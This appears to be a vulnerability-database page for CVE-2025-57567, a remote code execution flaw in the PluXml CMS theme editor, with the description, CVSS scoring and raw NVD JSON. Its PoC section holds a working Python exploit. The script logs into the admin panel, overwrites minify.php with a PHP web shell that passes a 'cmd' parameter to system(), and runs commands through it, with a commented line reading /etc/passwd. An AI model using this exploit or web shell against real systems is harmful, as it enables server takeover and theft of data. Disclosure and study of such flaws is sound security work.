Security Vulnerability Report
中文
CVE-2025-57567 CVSS 9.1 CRITICAL

CVE-2025-57567

Published: 2025-10-17 16:15:38
Last Modified: 2026-04-15 00:35:42

Description

A remote code execution (RCE) vulnerability exists in the PluXml CMS theme editor, specifically in the minify.php file located under the default theme directory (/themes/defaut/css/minify.php). An authenticated administrator user can overwrite this file with arbitrary PHP code via the admin panel, enabling execution of system commands.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PluXml CMS 所有未修复版本(具体版本范围待官方确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57567 PluXml CMS Theme Editor RCE PoC # Description: Exploits arbitrary PHP code injection via theme editor in minify.php import requests from bs4 import BeautifulSoup import sys TARGET_URL = "http://target-pluxml-site.com" ADMIN_USER = "admin" ADMIN_PASS = "password" # Step 1: Login to admin panel session = requests.Session() login_url = f"{TARGET_URL}/core/admin/auth.php" login_data = { "login": ADMIN_USER, "password": ADMIN_PASS, "submit": "" } response = session.post(login_url, data=login_data) # Step 2: Inject malicious PHP code into minify.php via theme editor malicious_code = '<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>' theme_editor_url = f"{TARGET_URL}/core/admin/theme.php" edit_data = { "action": "edit", "file": "../themes/defaut/css/minify.php", "content": malicious_code } response = session.post(theme_editor_url, data=edit_data) # Step 3: Execute system command via injected webshell shell_url = f"{TARGET_URL}/themes/defaut/css/minify.php?cmd=id" response = requests.get(shell_url) print(f"Command output: {response.text}") # Step 4: Get reverse shell or full server access # response = requests.get(f"{shell_url}&cmd=cat+/etc/passwd") # print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57567", "sourceIdentifier": "[email protected]", "published": "2025-10-17T16:15:38.373", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A remote code execution (RCE) vulnerability exists in the PluXml CMS theme editor, specifically in the minify.php file located under the default theme directory (/themes/defaut/css/minify.php). An authenticated administrator user can overwrite this file with arbitrary PHP code via the admin panel, enabling execution of system commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "http://pluxml.com", "source": "[email protected]"}, {"url": "https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-57567.pdf", "source": "[email protected]"}]}}